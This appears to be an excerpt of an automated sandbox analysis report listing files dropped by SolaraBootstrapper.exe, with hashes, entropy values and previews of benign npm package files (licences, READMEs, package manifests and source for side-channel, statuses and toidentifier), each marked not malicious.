                                                  Preview:MIT License..Copyright (c) 2019 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):98
                                                  Entropy (8bit):4.340548044508631
                                                  Encrypted:false
                                                  SSDEEP:3:SWEIh22Fd4MKLFEq6cF2Wl8WyfE8ksEMcJg:SWdh3GMKvF2K1ys8pl4g
                                                  MD5:80768A7B357B705EC6833447698D755C
                                                  SHA1:C771655B1E41409551D4C6167DE600DFA97E9C57
                                                  SHA-256:B8B53E5CE4F0A0BBE177414B83A2781A271F9338BD8C15A18B4EF6516F83B6BD
                                                  SHA-512:9B5A639D3369C06DE652660A20CEF3346514C5766C896127525D04792358C98C9814AAAE18167BDAA3EF784F567B40DCE98FDA21086A185B7F232BFDB5C63AA9
                                                  Malicious:false
                                                  Preview:# side-channel.Store information about any JS value in a side channel. Uses WeakMap if available..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):765
                                                  Entropy (8bit):5.027409719720289
                                                  Encrypted:false
                                                  SSDEEP:12:vuFwme8aWvbuE3dEOJcOJpDUCt9DYKyUCtjYWyUCCYbUCtvpwlOgqP+hVUiNy:Wxe8bTOKpDUGeUEKUoUSWOg6Ky
                                                  MD5:D4DCBD6AB3DE1FF05334780FBC4C4F8C
                                                  SHA1:CF40E5291FCE3764D536153B98D92B855BE0B01F
                                                  SHA-256:8E8E22035801206FDFFD363EBC6C3DA0D75B902D4E8C2DB5E7AB8F04AEC9F2E1
                                                  SHA-512:1693B70B280FDBDD075CF39587950F3B112D62C4030C5FB852CF33712C563AA9F89B2073691B5ADD47372CAD279DDFA1616B12C08FA3710C7811DFCE34327715
                                                  Malicious:false
                                                  Preview:declare namespace getSideChannel {..type Key = unknown;..type ListNode<T> = {...key: Key;...next: ListNode<T>;...value: T;..};..type RootNode<T> = {...key: object;...next: null | ListNode<T>;..};..function listGetNode<T>(list: RootNode<T>, key: ListNode<T>['key']): ListNode<T> | void;..function listGet<T>(objects: RootNode<T>, key: ListNode<T>['key']): T | void;..function listSet<T>(objects: RootNode<T>, key: ListNode<T>['key'], value: T): void;..function listHas<T>(objects: RootNode<T>, key: ListNode<T>['key']): boolean;...type Channel = {...assert: (key: Key) => void;...has: (key: Key) => boolean;...get: <T>(key: Key) => T;...set: <T>(key: Key, value: T) => void;..}.}..declare function getSideChannel(): getSideChannel.Channel;..export = getSideChannel;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3946
                                                  Entropy (8bit):5.090414231943572
                                                  Encrypted:false
                                                  SSDEEP:96:q9cnMSBRDzhzZH9m3TpDntqTiApdJpgVkwf3F8rj9uaGMIdyYqv:q+nM8zhzZHU9DnoTiAp3
                                                  MD5:AE7485EADF030BAC549BD7F2061C1369
                                                  SHA1:D98AB57304F572C0627627DF3AC4164755021244
                                                  SHA-256:5BBC044D84799159C43617A29F22AE6DC9437E58EE3D7A0ED247FC7236EBF863
                                                  SHA-512:71ABB443869BB4D61B7A01F504262B44CFC70E9694AE661F9425C5BD22356EEE7AC0673FC0D270D8FF67F100794E49C99E10C87B765454568BD7E26C79712A50
                                                  Malicious:false
                                                  Preview:'use strict';..var GetIntrinsic = require('get-intrinsic');.var callBound = require('call-bind/callBound');.var inspect = require('object-inspect');..var $TypeError = require('es-errors/type');.var $WeakMap = GetIntrinsic('%WeakMap%', true);.var $Map = GetIntrinsic('%Map%', true);..var $weakMapGet = callBound('WeakMap.prototype.get', true);.var $weakMapSet = callBound('WeakMap.prototype.set', true);.var $weakMapHas = callBound('WeakMap.prototype.has', true);.var $mapGet = callBound('Map.prototype.get', true);.var $mapSet = callBound('Map.prototype.set', true);.var $mapHas = callBound('Map.prototype.has', true);../*.* This function traverses the list returning the node corresponding to the given key..*.* That node is also moved to the head of the list, so that if it's accessed again we don't need to traverse the whole list. By doing so, all the recently used nodes can be accessed relatively quickly..*/./** @type {import('.').listGetNode} */.var listGetNode = function (list, key) { // es
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2275
                                                  Entropy (8bit):5.137595755834066
                                                  Encrypted:false
                                                  SSDEEP:48:0FEsBfi0ZRpcOl547ag4fzyRYsEg4ajjsdlcOVsQSowCL:fmBcO0yB3+NQZ
                                                  MD5:9D06D3C21AE37A4600C5685BAAD644FA
                                                  SHA1:062874AAC32D117772AE1AB996E7B84F72749F01
                                                  SHA-256:954C73E75C5B7C07C858B08C73748D81D3599A481CA81758597552C1F89482E1
                                                  SHA-512:3E9D6E0BE3FBDA37247A87A3DAF76619CAAB6F10518AB2CEEA0BF61FFB48A26753113E436D5AF777B42E906033BAF858795FA8DE4C129E75923C90F8C0533D2B
                                                  Malicious:false
                                                  Preview:{.."name": "side-channel",.."version": "1.0.6",.."description": "Store information about any JS value in a side channel. Uses WeakMap if available.",.."main": "index.js",.."exports": {..."./package.json": "./package.json",...".": "./index.js"..},.."types": "./index.d.ts",.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prelint": "eclint check $(git ls-files | xargs find 2> /dev/null | grep -vE 'node_modules|\\.git')",..."lint": "eslint --ext=js,mjs .",..."postlint": "tsc -p .",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository":
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1959
                                                  Entropy (8bit):4.858672772105557
                                                  Encrypted:false
                                                  SSDEEP:48:jGYJuJv05eTbZXwR3zYI32xe/wx/6NSEPlaT26UwW:KVR26GDYQ2AwVeSEtaT26Uf
                                                  MD5:A92F4AA888D8A92C83E4F541BE478068
                                                  SHA1:AB1399D89EB6D431DB6C17160A10A71FA3562EFA
                                                  SHA-256:966BDD1F6EC740CF64049B8542A4B90996986C16FC837FD7F6DB5971DE7FFBCA
                                                  SHA-512:C4DE86AF66E676A9AF0908FA0BBA93C36AE592E0C5AA762D409F2E779C740AB38D4C9B1F059CD1E3024C525299CA40AAC5AC447DB3394EE026CD7B34DDB84ED4
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..var getSideChannel = require('../');..test('export', function (t) {..t.equal(typeof getSideChannel, 'function', 'is a function');..t.equal(getSideChannel.length, 0, 'takes no arguments');...var channel = getSideChannel();..t.ok(channel, 'is truthy');..t.equal(typeof channel, 'object', 'is an object');...t.end();.});..test('assert', function (t) {..var channel = getSideChannel();..t['throws'](...function () { channel.assert({}); },...TypeError,...'nonexistent value throws'..);...var o = {};..channel.set(o, 'data');..t.doesNotThrow(function () { channel.assert(o); }, 'existent value noops');...t.end();.});..test('has', function (t) {..var channel = getSideChannel();../** @type {unknown[]} */ var o = [];...t.equal(channel.has(o), false, 'nonexistent value yields false');...channel.set(o, 'foo');..t.equal(channel.has(o), true, 'existent value yields true');...t.equal(channel.has('abc'), false, 'non object value non existent yields false');...chan
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3195
                                                  Entropy (8bit):4.736326326543835
                                                  Encrypted:false
                                                  SSDEEP:48:cj+2nTY8LdkWoltx4I8OjMGqoqZjuJGJkeGzJfYMT2s+Tmz:I+WWtx4ITjDqoql+Ok3AMqs+Tmz
                                                  MD5:D8A043C42FC4D89057F4DD4BE72C3EA9
                                                  SHA1:47D00B1A54AFD2080104036E09A565C8F9F670DF
                                                  SHA-256:55D3CA9EE2A017D8D9A969C47FD7623B4619CDD29010B5CDECBF7C88B42D23A7
                                                  SHA-512:C9966A66202E6F816AE76A855B0E116E2E1C09C2D81BD42D940B3464467E526DE85AD0F2DB320DBB5FDEDA6793B750E2D445F7510C743031FB3BF13D94441B42
                                                  Malicious:false
                                                  Preview:{.."compilerOptions": {.../* Visit https://aka.ms/tsconfig.json to read more about this file */..../* Projects */..../* Language and Environment */..."target": "es2022",................./* Set the JavaScript language version for emitted JavaScript and include compatible library declarations. */...// "lib": [],..................../* Specify a set of bundled library declaration files that describe the target runtime environment. */...// "noLib": true,................../* Disable including any library files, including the default lib.d.ts. */..."useDefineForClassFields": true,.......... /* Emit ECMAScript-standard-compliant class fields. */...// "moduleDetection": "auto",............/* Control what method is used to detect module-format JS files. */..../* Modules */..."module": "commonjs",................/* Specify what module code is generated. */...// "rootDir": "./",................./* Specify the root folder within your source files. */...// "moduleResolution": "node",........... /* S
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1546
                                                  Entropy (8bit):4.820897399885229
                                                  Encrypted:false
                                                  SSDEEP:24:D8OZyFWGzWEoDJpzLxiceIpYKDnWHgrAtZaxSodAd4ZQ2CSaG1U:QgHD1iapYKu1OjdA1SagU
                                                  MD5:8AF2A0A8CAAD8A309A0947248658F3C5
                                                  SHA1:31B35B6101BAD5827C9F686DFB021C884736684A
                                                  SHA-256:41762CE40AAE520BBD476B81288EC5FB717BA11DA9409DBE74F782AA5F71D04D
                                                  SHA-512:7AF380BED9615120F69EF5B1B77EC3B2FD287BA24BD2EE74F64CA5F715835C6F693165570DA75529FFAB82750D7115DF9B84E10D7FD959063A974B6DD9193D0D
                                                  Malicious:false
                                                  Preview:2.0.1 / 2021-01-03.==================.. * Fix returning values from `Object.prototype`..2.0.0 / 2020-04-19.==================.. * Drop support for Node.js 0.6. * Fix messaging casing of `418 I'm a Teapot`. * Remove code 306. * Remove `status[code]` exports; use `status.message[code]`. * Remove `status[msg]` exports; use `status.code[msg]`. * Rename `425 Unordered Collection` to standard `425 Too Early`. * Rename `STATUS_CODES` export to `message`. * Return status message for `statuses(code)` when given code..1.5.0 / 2018-03-27.==================.. * Add `103 Early Hints`..1.4.0 / 2017-10-20.==================.. * Add `STATUS_CODES` export..1.3.1 / 2016-11-11.==================.. * Fix return type in JSDoc..1.3.0 / 2016-05-17.==================.. * Add `421 Misdirected Request`. * perf: enable strict mode..1.2.1 / 2015-02-01.==================.. * Fix message for status 451. - `451 Unavailable For Legal Reasons`..1.2.0 / 2014-09-28.==================.. * Add `208 Alre
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1172
                                                  Entropy (8bit):5.173454209157481
                                                  Encrypted:false
                                                  SSDEEP:24:8FMpfrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:8FMpfaJHlxE35QHOs5exm3ogF5n
                                                  MD5:36E2BC837CE69A98CC33A9E140D457E5
                                                  SHA1:4D50453741267C3B931C605E9316DABBFA641117
                                                  SHA-256:512CFA4D5E7A7569C7AE4DD95241CB6AE2AAF648EF9EBD080C01BD24868D26E9
                                                  SHA-512:5CC6A4D89A5DCB1A9DE765BC74B766CB8BB80718A7A89AEDBDC3F7B981FDC2FFAB7382EEB3F1CA15AF88ADAD3232C79C43094AD15B21DDBE87243C1643AE0641
                                                  Malicious:false
                                                  Preview:.The MIT License (MIT)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2016 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):3559
                                                  Entropy (8bit):5.04694498515446
                                                  Encrypted:false
                                                  SSDEEP:48:EdC9vR/vnNdXMoNj5W/BzQjXjHI5ptZF/4/I8pYTX3eWczlKJn+CBzA19:ACLvN15QzmI5CjYyBKJ+j
                                                  MD5:EEE769AE22B8D78E06C654220B9D4A30
                                                  SHA1:B8F4EE6EE29D4757C5156003190D9FAAB8D1D46D
                                                  SHA-256:CFED51FFE74E16E4D6945854D440366E0CA9F349D84807ED5AD0BDDDE2F006F4
                                                  SHA-512:EA1B560066D660473CE05DAA94BA66F38329D81D443F23A1D98FB6366AC0F11B351FA08F848B1AB2A678EBC34322D2FFCC918E44AC861755E2437B5EE3570D6F
                                                  Malicious:false
                                                  Preview:# statuses..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..HTTP status utility for node...This module provides a list of status codes and messages sourced from.a few different projects:.. * The [IANA Status Code Registry](https://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml). * The [Node.js project](https://nodejs.org/). * The [NGINX project](https://www.nginx.com/). * The [Apache HTTP Server project](https://httpd.apache.org/)..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install statuses.```..## API.. eslint-disable no-unused-vars -->..```js.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1789
                                                  Entropy (8bit):4.814481084626097
                                                  Encrypted:false
                                                  SSDEEP:48:jsaTUBfhUefZVD/4Cisf6p3+pf1n3pbNC:gWUBfJfww6p3+1y
                                                  MD5:8FE432AAB55E65B4ED24A6753D5E53CA
                                                  SHA1:895FEAB83D6F7AAB850842B5332B2F2AA7F2A344
                                                  SHA-256:D2DAA083F11600277BD2BF9823BB48EDE916A5B0924D2991D6BC4CE331D5604B
                                                  SHA-512:B36C6E6952262DF585557B08A01292AED3AC474634C949DA8457CF99D70B210604C75E11AEC5BEF850B20F0783E6C128D5F4513F4F92C71791752C6011C4A2D2
                                                  Malicious:false
                                                  Preview:{. "100": "Continue",. "101": "Switching Protocols",. "102": "Processing",. "103": "Early Hints",. "200": "OK",. "201": "Created",. "202": "Accepted",. "203": "Non-Authoritative Information",. "204": "No Content",. "205": "Reset Content",. "206": "Partial Content",. "207": "Multi-Status",. "208": "Already Reported",. "226": "IM Used",. "300": "Multiple Choices",. "301": "Moved Permanently",. "302": "Found",. "303": "See Other",. "304": "Not Modified",. "305": "Use Proxy",. "307": "Temporary Redirect",. "308": "Permanent Redirect",. "400": "Bad Request",. "401": "Unauthorized",. "402": "Payment Required",. "403": "Forbidden",. "404": "Not Found",. "405": "Method Not Allowed",. "406": "Not Acceptable",. "407": "Proxy Authentication Required",. "408": "Request Timeout",. "409": "Conflict",. "410": "Gone",. "411": "Length Required",. "412": "Precondition Failed",. "413": "Payload Too Large",. "414": "URI Too Long",. "415": "Unsupported Media Type",. "
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2610
                                                  Entropy (8bit):4.799283166041097
                                                  Encrypted:false
                                                  SSDEEP:48:GXuRdjBVX/YHIBzNmqHmeDiZ/oL6T7od3jNiRAYq1iYq+QTXSM:2ajH/od26mjwAQT+yXSM
                                                  MD5:7C5205330288C271E7582C282E40D21A
                                                  SHA1:D9C8B2F32DED4AFCF305665C3369E59718A699E6
                                                  SHA-256:96A0698E899F5889CF254D1F2E351F3253A37921C7F87269B0E87A497DEC666A
                                                  SHA-512:688EB30F0D28F165415A1888283B473C403D23BA09AAD1C4FEF9480D7009A3352648C4C2B7AA2AADA6FA08423CE181E98157AAC7825A290F74434EA8448F1F5B
                                                  Malicious:false
                                                  Preview:/*!. * statuses. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var codes = require('./codes.json')../**. * Module exports.. * @public. */..module.exports = status..// status code to message map.status.message = codes..// status message (lower-case) to code map.status.code = createMessageToStatusCodeMap(codes)..// array of status codes.status.codes = createStatusCodeList(codes)..// status codes for redirects.status.redirect = {. 300: true,. 301: true,. 302: true,. 303: true,. 305: true,. 307: true,. 308: true.}..// status codes for empty bodies.status.empty = {. 204: true,. 205: true,. 304: true.}..// status codes for when you should retry the request.status.retry = {. 502: true,. 503: true,. 504: true.}../**. * Create a map of message to status code.. * @private. */..function createMessageToStatusCodeMap (codes) {. var map = {}.. Object.keys(codes).forEach(f
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1440
                                                  Entropy (8bit):4.832311815218477
                                                  Encrypted:false
                                                  SSDEEP:24:ngVI1GbxVWbeKpadVQquQCFPIZBlWJVgn0AqpcMcswc/boO7xLAwgEq105P6u:ngaGdVWbeKpajQquQCFPITUJCBKRoO73
                                                  MD5:210CDA9D522BAB0911DFF42346DEE4BE
                                                  SHA1:3328D9BFC82E4F981A1ACD2F3F78C524BF85333C
                                                  SHA-256:53BD1B14E481356BF004C0A45F9022D07FBC56BFE849115E141BA302C8818275
                                                  SHA-512:8BAF4A077586EFC571B3B32C64DFDE8A2A0AEB4ECEA91E016FF96E40051C0DE4E6C09CDB8C0711A2731A77120D9ACEAC0BF2077D0E14E28853FEF90D512AB620
                                                  Malicious:false
                                                  Preview:{. "name": "statuses",. "description": "HTTP status utility",. "version": "2.0.1",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "repository": "jshttp/statuses",. "license": "MIT",. "keywords": [. "http",. "status",. "code". ],. "files": [. "HISTORY.md",. "index.js",. "codes.json",. "LICENSE". ],. "devDependencies": {. "csv-parse": "4.14.2",. "eslint": "7.17.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.22.1",. "eslint-plugin-markdown": "1.0.2",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "4.2.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "8.2.1",. "nyc": "15.1.0",. "raw-body": "2.4.1",. "stream-to-array": "2.3.0". },. "engines": {. "node": ">= 0.8". },. "scripts": {. "build": "node scripts/build.js",. "fetch": "node scripts/fetch-apache.js && node scripts/fetch-i
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):128
                                                  Entropy (8bit):4.001704000816424
                                                  Encrypted:false
                                                  SSDEEP:3:SVfRUdSF9auv7L3mTolYnFhF4:SKSyuv/mTog2
                                                  MD5:97E13024947E8F5344B81F81F299118B
                                                  SHA1:8A71328D8FB1D0F995793F731F5BE462FD48D048
                                                  SHA-256:4839C59F4E7364D7DB5746D3F63FB54C0E81AA8B2C7DBD20009438D1D0864CF0
                                                  SHA-512:CC4CE0C27B5AD41D6376073802E417A5A3848286791ACC3B365A72D9AA92CA404EB30D4D5F92964643A6E2B0B58FC6DC5F7AF56CE4E7907F31F818BC2A46A513
                                                  Malicious:false
                                                  Preview:1.0.1 / 2021-11-14.==================.. * pref: enable strict mode..1.0.0 / 2018-07-09.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1108
                                                  Entropy (8bit):5.123579025270232
                                                  Encrypted:false
                                                  SSDEEP:24:urmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:uaJHlxE3dQHOs5exm3ogFh
                                                  MD5:1A261071A044D02EB6F2BB47F51A3502
                                                  SHA1:3E2A9FED4450C1CB906E8E143AE9327C2542EE4D
                                                  SHA-256:A832D679750E49AB433626AB196350B89964B60EB0D3EDD3341887C7D5F4C128
                                                  SHA-512:AC92FC0235765E95A55F1415B04BD3A856867AC371F100CC06B579DB2761F06F22FE6F15A152705BE851D93F3556A7233931A23EFD6A48E1B82C17CFFBB5DF2E
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2016 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHER
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1803
                                                  Entropy (8bit):5.060708957620034
                                                  Encrypted:false
                                                  SSDEEP:48:IqXhIvI5xdXMoNjT16C24arMIRaVIEmVd:TXeQ5x15f16Q6JRaiEmX
                                                  MD5:F4A4BDB58E15B4A187D4D51DEB32C8DD
                                                  SHA1:4B9FD35B2A669B33D43D25423543AB2BD522C144
                                                  SHA-256:BBC5B74840438EC9D0D189C10C013C3E0AD9E0ADD6F09CB16034B8F693D73FF8
                                                  SHA-512:6913DACA56C988F00C2F5A436BDF14A40D9E3B3D94D82735398C646EEAADB56E525091EBA358745215BAA75E89920D88D09FA6D2D7018452F6FCC310D949DE29
                                                  Malicious:false
                                                  Preview:# toidentifier..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test Coverage][codecov-image]][codecov-url]..> Convert a string of words to a JavaScript identifier..## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```bash.$ npm install toidentifier.```..## Example..```js.var toIdentifier = require('toidentifier')..console.log(toIdentifier('Bad Request')).// => "BadRequest".```..## API..This CommonJS module exports a single default function: `toIdentifier`...### toIdentifier(string)..Given a string as the argument, it will be transformed according to.the following rules and the new string will be returned:..1. Split into words separated by space characters (`0x20`)..2. Upper cas
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):4.827349515069804
                                                  Encrypted:false
                                                  SSDEEP:12:Usp+YNwtlXZAtB5azEYpX5v2Rnm0cdr5rRcA:L+RpAtBczEwvqUzRcA
                                                  MD5:B7A1B5C3F74FF7E0A11B61D56673AFA0
                                                  SHA1:FC66E4445021B49B1F4386CA72CAD654DC408D34
                                                  SHA-256:F9F26B0E90E2569B61D02EF2A92718624B8854592B1EDE7F2C8879A69CFDBA05
                                                  SHA-512:96163678827F633CBEA608AF831F018DB8577EE22543D6DFD6550A176FE84B4B78550DFB5ECBFE60F1096438B3CE485FBCE86288EBDCE8B6D90484D7CDA079CE
                                                  Malicious:false
                                                  Preview:/*!. * toidentifier. * Copyright(c) 2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = toIdentifier../**. * Trasform the given string into a JavaScript identifier. *. * @param {string} str. * @returns {string}. * @public. */..function toIdentifier (str) {. return str. .split(' '). .map(function (token) {. return token.slice(0, 1).toUpperCase() + token.slice(1). }). .join(''). .replace(/[^ _0-9a-z]/gi, '').}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1142
                                                  Entropy (8bit):4.860927237671107
                                                  Encrypted:false
                                                  SSDEEP:24:NBCV1TxVzqH0YuNCeRIZCLlWi2poZKLl105P6u:7cVV9YuNCeRIQUloo703
                                                  MD5:FD6E2543A1B015CC443C7A2DCC4E3668
                                                  SHA1:E8FE1D02A381B71A33E41588AE26746D34FA4903
                                                  SHA-256:F34C59F784D43DA6E633390D85D14CA60539B4676159444F313C62FCFC3B68DC
                                                  SHA-512:C08DA7B7852C9B297A29F6FB5DCF51A67B513CAEC17474ACECBCF324C5615601FE99744BD49E90F0A21D8A5710ABD58E78B4A89D9CA0E4B0B1F29584BA54B57E
                                                  Malicious:false
                                                  Preview:{. "name": "toidentifier",. "description": "Convert a string of words to a JavaScript identifier",. "version": "1.0.1",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Nick Baugh <niftylettuce@gmail.com> (http://niftylettuce.com/)". ],. "repository": "component/toidentifier",. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.3",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "4.3.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.1.3",. "nyc": "15.1.0". },. "engines": {. "node": ">=0.6". },. "license": "MIT",. "files": [. "HISTORY.md",. "LICENSE",. "index.js". ],. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5447
                                                  Entropy (8bit):4.788280765441003
                                                  Encrypted:false
                                                  SSDEEP:48:oZntLPqJhX3LWD9H01NO+3B63fTuQ+OCWy90WiKDuINQo+lPxVJSzkWq4KL39f6/:atzIHB6fKuOP+xGb3K79fdq
                                                  MD5:6025A974D281159ED5421301B58FD126
                                                  SHA1:767D7F2B0484283242C6A9FF84EE4EF85E79403C
                                                  SHA-256:B32B37E94681B90954E8E6D29CAEF74A6B864055292634C36FB58FB50A9BDDAE
                                                  SHA-512:188514E22DBAB6F55FB65266513F736F918856D34DC2F6FC23FFEA57A83DEFDCF26140D1382AF70A1759E7382D587D376740C5D00FD7E7081246290CAF0E80CB
                                                  Malicious:false
                                                  Preview:1.6.18 / 2019-04-26.===================.. * Fix regression passing request object to `typeis.is`..1.6.17 / 2019-04-25.===================.. * deps: mime-types@~2.1.24. - Add Apple file extensions from IANA. - Add extension `.csl` to `application/vnd.citationstyles.style+xml`. - Add extension `.es` to `application/ecmascript`. - Add extension `.nq` to `application/n-quads`. - Add extension `.nt` to `application/n-triples`. - Add extension `.owl` to `application/rdf+xml`. - Add extensions `.siv` and `.sieve` to `application/sieve`. - Add extensions from IANA for `image/*` types. - Add extensions from IANA for `model/*` types. - Add extensions to HEIC image types. - Add new mime types. - Add `text/mdx` with extension `.mdx`. * perf: prevent internal `throw` on invalid type..1.6.16 / 2018-02-16.===================.. * deps: mime-types@~2.1.18. - Add `application/raml+yaml` with extension `.raml`. - Add `application/wasm` with extension `.wasm`.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1172
                                                  Entropy (8bit):5.194993512942844
                                                  Encrypted:false
                                                  SSDEEP:24:vSiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:vSiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:0AFD201E48C7D095454EED4AC1184E40
                                                  SHA1:6A4ED3B5E9CFF68AF7593DFCB8BE3C1CBEA837D0
